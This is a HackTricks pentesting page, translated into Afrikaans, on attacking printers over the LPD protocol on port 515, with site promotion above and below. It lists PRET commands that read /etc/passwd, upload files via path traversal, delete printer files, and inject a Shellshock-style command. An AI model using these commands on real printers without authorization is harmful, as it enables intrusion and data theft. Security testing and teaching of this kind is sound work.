4 KiB
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Inleiding tot LPD Protokol
In die 1980's is die Line Printer Daemon (LPD) protokol ontwikkel in Berkeley Unix, wat later deur RFC1179 geformaliseer is. Hierdie protokol werk oor poort 515/tcp, wat interaksies deur die lpr
opdrag moontlik maak. Die essensie van druk via LPD behels die stuur van 'n beheerlêer (om werksbesonderhede en gebruiker te spesifiseer) saam met 'n data lêer (wat die drukinligting bevat). Terwyl die beheerlêer die keuse van verskeie lêerformate vir die datalêer toelaat, word die hantering van hierdie lêers bepaal deur die spesifieke LPD implementering. 'n Algemeen erkende implementering vir Unix-agtige stelsels is LPRng. Opmerklik is dat die LPD protokol uitgebuit kan word om kwaadwillige PostScript of PJL drukwerk uit te voer.
Gereedskap vir Interaksie met LPD Drukkers
PRET stel twee noodsaaklike gereedskap bekend, lpdprint
en lpdtest
, wat 'n eenvoudige metode bied om met LPD-ondersteunde drukkers te kommunikeer. Hierdie gereedskap stel 'n reeks aksies in staat, van die druk van data tot die manipulasie van lêers op die drukker, soos aflaai, oplaai of verwyder:
# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local
Vir individue wat belangstel om die wêreld van printer hacking verder te verken, kan 'n omvattende hulpbron hier gevind word: Hacking Printers.
Shodan
port 515
{% hint style="success" %}
Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.